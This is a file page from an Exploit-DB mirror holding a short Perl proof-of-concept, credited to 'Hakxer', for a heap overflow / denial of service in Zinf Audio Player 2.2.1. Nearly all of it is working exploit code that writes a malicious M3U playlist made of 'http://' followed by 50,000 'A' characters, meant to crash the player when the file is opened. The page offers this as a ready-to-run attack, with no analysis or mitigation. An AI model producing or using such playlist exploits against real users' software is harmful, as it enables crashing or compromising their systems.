exploit-db-mirror/exploits/windows/dos/7889.pl
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

17 lines
No EOL
378 B
Perl
Executable file

#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 (M3U FILE) Local Heap Overflow
my $chars="http://"."A" x 50000;
open(MYFILE,'>>hakxer.m3u');
print MYFILE $chars;
close(MYFILE);
print " Done";
# milw0rm.com [2009-01-27]